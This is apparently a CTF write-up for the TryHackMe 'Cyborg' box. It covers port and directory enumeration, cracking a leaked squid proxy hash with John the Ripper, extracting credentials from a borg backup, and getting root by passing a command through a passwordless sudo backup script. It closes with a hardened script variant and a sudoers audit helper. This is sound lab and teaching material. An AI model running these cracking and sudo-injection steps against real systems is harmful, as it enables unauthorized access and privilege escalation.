TryHackMe - Cyborg

A box involving encrypted archives, source code analysis and more.

Let's do Cyborg on TryHackMe

Open Ports

$ nmap -sV -sC --open -Pn $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-09 01:57 EDT
Nmap scan report for 10.10.238.68
Host is up (0.18s latency).
Not shown: 704 closed tcp ports (conn-refused), 294 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web

Enumerate the web server's directories with gobuster to see what it exposes beyond the default page.

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://$IP

/admin

Poking around we see some chatter which gives away what else to look for:

Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy i mentioned earlier. I decided to give up like i always do ahahaha sorry about that. I heard these proxy things are supposed to make your website secure but i barely know how to use it so im probably making it more insecure in the process. Might pass it over to the IT guys but in the meantime all the config files are laying about. And since i dont know how it works im not sure how to delete them hope they don't contain any confidential information lol. other than that im pretty sure my backup "music_archive" is safe just to confirm.

Download the music archive, archive.tar

The squid proxy configuration files mentioned in the note are also exposed on the web server: /etc/squid/{passwd, squid.conf}

Download the passwd file and crack the hash it contains with John the Ripper:

$ john -wordlist:/usr/share/wordlists/rockyou.txt ./passwd      
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
********        (music_archive)     
1g 0:00:00:00 DONE (2022-10-09 02:04) 2.000g/s 77952p/s 77952c/s 77952C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Use the cracked password with borg to extract the downloaded archive. Inside it, a note records credentials in plain text:

$ cat Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

****:**********

Initial Access - SSH

Now we can SSH to the server as alex with the found password.

alex@ubuntu:~$ cat user.txt
flag{*********************************}

Privilege Escalation

alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

The backup script can be run via sudo without a password, and reading it shows that it accepts an option carrying a command to run:

while getopts c: flag          # -c takes an argument, delivered in $OPTARG
do
    case "${flag}" in
        c) command=${OPTARG};;  # stored here and executed later in the script
    esac
done

So we can pass an arbitrary command with -c; the script executes it towards its end, and because the script itself runs under sudo, that command runs as root.

$ sudo /etc/mp3backups/backup.sh -c "cat /root/root.txt"

flag{***********************************}
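As an added example (not the box's backup.sh nor any TryHackMe code), here is the option-handling pattern quoted above beside a hardened form that only accepts named actions, plus a small check for sudo -l lines; the function names and the verify/rotate actions are constructed for illustration.

```sh
#!/bin/sh
# Added example, not the box's /etc/mp3backups/backup.sh: the unsafe option
# pattern from the writeup, a hardened form, and a sudoers audit helper.

# Vulnerable pattern: whatever follows -c is stored and executed later. Under a
# NOPASSWD sudo rule this hands root to every user allowed to run the script.
backup_unsafe() {
    OPTIND=1
    command=""
    while getopts c: flag; do
        case "${flag}" in
            c) command=${OPTARG};;
        esac
    done
    # ... archive work would go here ...
    ${command}          # caller-controlled input, run with the script's privileges
}

# Hardened form: no free-form command option. The caller picks one of a fixed
# set of actions; the option value is only ever compared, never executed.
backup_safe() {
    OPTIND=1
    action=""
    while getopts a: flag; do
        case "${flag}" in
            a) action=${OPTARG};;
            *) return 2;;        # unknown option: refuse rather than guess
        esac
    done
    case "${action}" in
        verify) echo "verify: checking archive integrity"; return 0;;
        rotate) echo "rotate: pruning old archives"; return 0;;
        *)      echo "unknown action: ${action}" >&2; return 1;;
    esac
}

# Audit helper for one line of "sudo -l" output: a NOPASSWD rule that targets a
# shell script deserves the same review as a setuid binary, because the script's
# own argument handling (as above) decides what the rule really grants.
nopasswd_script_rule() {
    case "$1" in
        *NOPASSWD:*.sh) return 0;;   # e.g. "(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh"
        *) return 1;;
    esac
}
```

Run nopasswd_script_rule over each line of sudo -l output on a host to list the scripts that need this kind of review.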